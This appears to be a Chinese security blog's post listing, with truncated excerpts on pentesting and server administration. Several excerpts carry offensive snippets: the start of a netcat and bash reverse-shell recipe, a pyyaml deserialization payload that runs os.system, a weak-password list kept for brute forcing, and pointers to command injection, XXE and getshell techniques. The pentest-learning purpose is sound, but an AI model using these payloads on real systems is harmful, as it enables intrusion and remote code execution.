几种Linux下反弹shell的方法总结

在渗透测试过程中我们需要把测试目标的shell反弹到我们的主机中,方便测试。比如在测试到命令注入时,可以反弹shell进行进一步测试。 一、nc和bash 在我们的主机上执行 nc -lvp port 表示显示执行过程监听端口 在目标主机上执行 bash -i >&a...

2019-02-14 17:42:20

阅读数 12

评论数 0

pyyaml反序列化漏洞

pyyaml在解析含有!!开头的数据会强制进行类型转换成字符串格式。 测试 import yaml yaml.load('!!python/object/apply:os.system ["date"]')   结果 poc还可以 !!pyt...

2019-02-14 14:05:38

阅读数 17

评论数 0

解决python Markdown模块乱码

有个需求需要把markdown转成html模块,查询了一下刚好有这个模块 安装 pip install amrkdown 安装完成直接转换并保存为html时,发现出现中文乱码的情况 用编辑器打开发现是缺少utf8编码 所以只需要在头增加一行<meta http...

2019-01-22 18:32:00

阅读数 37

评论数 1

docker ubuntu REST API

最近需要使用docker api。简单记录一下 一、安装配置 测试机器:ubuntu16.04 配置文件路径查询 systemctl show --property=FragmentPath docker  配置文件 sudo vim  /lib/systemd/system/dock...

2019-01-15 17:09:50

阅读数 34

评论数 0

docker Starting MySQL database server mysqld fail解决办法

今天有一个ubuntu+mysql的测试环境,在容器重启的时候mysql启动失败,导致docker启动失败。 首先查看docker日志 docker logs 8a16 发现有如下报错:  * Stopping MySQL database server mysqld    ...don...

2018-12-18 18:28:27

阅读数 108

评论数 0

2018弱密码TOP 100

MARK:留着爆破测试 弱口令使用 123456 password 123456789 12345678 12345 111111 1234567 sunshine qwerty iloveyou princess admin welcome 666666 abc123 football 12...

2018-12-17 13:24:15

阅读数 191

评论数 0

解决redhat vmware安装后鼠标不能使用问题

今天VMware搭建一个redhat发现鼠标不能使用,需要设置成PS2模式才能使用。 网上好多说法都不是很靠谱,最终找到一个靠谱解决的办法了,记录一下。 解决办法: 1、将启动模式设置为文本模式 看到操作系统列表后,按e进入编辑模式,移动光标到以kernel开头的那一行,再次键入e,这时会...

2018-12-11 09:52:46

阅读数 227

评论数 0

命令注入

命令注入是一种常见的漏洞形态。一旦存在命令注入漏洞,攻击者就可以在目标系统执行任意命令。 测试脚本command.py: import os,subprocess import sys command = "ping -c 4 {}".format(sys...

2018-12-04 10:34:57

阅读数 95

评论数 0

insert、update和delete 注入方法

我们常见的注入都是select的查询注入比较多,但是SQL注入在参数没有检查和过滤的时候就会把恶意的数据插入数据库,从而造成SQL注入。 所有说除了查询之外,所有和数据库进行交互的请求都有可能造成注入。如:插入数据,更改数据,删除数据等,所以现在根据网上的技巧汇总一下insert、update和...

2018-11-28 20:23:53

阅读数 216

评论数 0

web页面点击劫持

今天看到一个google的点击劫持漏洞获得7500美刀,连接如下 https://apapedulimu.click/clickjacking-on-google-myaccount-worth-7500/   点击劫持漏洞,利用UI重叠,视觉上的欺骗的漏洞,用于钓鱼。 了解点击劫持可以参...

2018-11-14 19:55:07

阅读数 145

评论数 0

windows设置开机启动脚本修改配置文件和重启服务

有一台动态ip的测试机器,上面部署Nginx,然后每次重启机器后ip总会变动,需要改nginx.conf配置文件和重启nginx服务。 所以要解决这个问题,想到的解决方法: 1、python脚本来解决修改配置和重启服务 2、把python脚本制作成exe文件 3、exe脚本添加为开机启动 ...

2018-11-07 15:04:57

阅读数 195

评论数 0

Nginx通过二级目录反向代理不同端口的站点

今天在同一台测试机器上搭建了IIS的站点,Tomcat的站点,weblogic站点。现在有个需求这三个站点都要使用80端口进行访问,因为是在局域网里所以没有办法设置不同的域名作为server_name。后面想到可以用二级目录作为区分。 所以修改nginx.conf文件添加: upstr...

2018-11-02 10:57:09

阅读数 323

评论数 0

IIS搭建php站点时访问会提示要登录

今天要整合一个漏洞环境把php和asp两种编程语言的站点整合到一起,在这个过程中遇到了一个问题。就是访问php文件的时候一直会提示需要输入用户名密码。 问题描述: 您未被授权查看该页    您不具备查看该目录或页面的权限,因为访问控制列表     (ACL)     对     Web    ...

2018-11-01 14:06:19

阅读数 56

评论数 0

weblogic环境搭建的遇到的问题记录

1.安装时JAVA_HOME路径无效 修改文件/home/weblogic/Oracle/Middleware/wlserver_10.3/common/bin/commEnv.sh文件 修改JAVA_HOME路径为  JAVA_HOME="/usr/lib/jvm/java...

2018-10-08 21:39:49

阅读数 45

评论数 0

CNVD原创漏洞证书总结

之前打算申请个CNVD的原创漏洞证书。经过这一个多月的时间证书下来了,现在简单总结一下。 原创漏洞审核和处理流程参考此链接:http://www.cnvd.org.cn/webinfo/show/3933 然后我就说说我提交过两个后台的文件上传漏洞 7.26提交-7.27二审通过,验证通过-...

2018-09-12 10:51:41

阅读数 1541

评论数 0

cms后台利用更新模块压缩包getshell

最近在找文件上传漏洞比较多。现在发现比较难找了,一是文件校验比前几年的更加严格了,黑名单还可以想办法绕过,白名单就相对困难了。 最近发现一个getshell的方法,原理是利用文件更新上传带有shell的压缩包。 https://github.com/idreamsoft/iCMS/issues...

2018-09-07 09:45:16

阅读数 141

评论数 0

python多进程爬虫解决进程挂掉问题

这几天写了个爬虫,爬取的数据比较多。一直挂在服务器上跑,后面发现启动十个进程总会运行着某几个进程挂掉,导致数据采集工作比较延后。 后面重新改进了一下,从日志中读取当前进程断点,继续爬取。 用了一个笨方法解决进程挂掉的问题。就是每半个小时关闭所有进程,重新从断点开始,当然各位有好的方法可以留言告...

2018-09-04 16:51:16

阅读数 437

评论数 0

mysql替换字符串技巧

今天整理一下数据库的表,发现有好些地方需要替换,格式是固定的但是字符是变化的。 如: 红框中  漏洞类型:XXX弱点描述,是需要删除的。中间的字符是变化的,此时可以使用locate、substring和replace三个方法结合就可以成功清除掉冗余的字符。 1、截取字符串 subst...

2018-08-17 14:08:29

阅读数 779

评论数 0

XXE payload

一、漏洞原理 当xml可以控制,并且后端没有过滤时就存在XXE漏洞。xml解析是引用外部实体。 二、漏洞测试 平时burp 抓包 可以在请求头添加  Content-type:application/xml 并添加 xml语句如果报错 或执行则有可能存在xxe漏洞,不断根据response ...

2018-08-16 15:37:29

阅读数 518

评论数 0

账号安全测试总结

总结一下会出现账号安全的地方。 一、账号密码直接暴露在互联网上 1、关注是否把账号信息上传到github上,如数据库信息、邮件配置信息、SVN、数据库备份信息等。 二、无限制登录任意账号 1、不设置最多登录错误次数,可以暴力破解的 2、没有验证码的 3、登录存在sql注入,可以使用万能...

2018-08-12 22:27:36

阅读数 131

评论数 0

提示
确定要删除当前文章?
取消 删除
关闭
关闭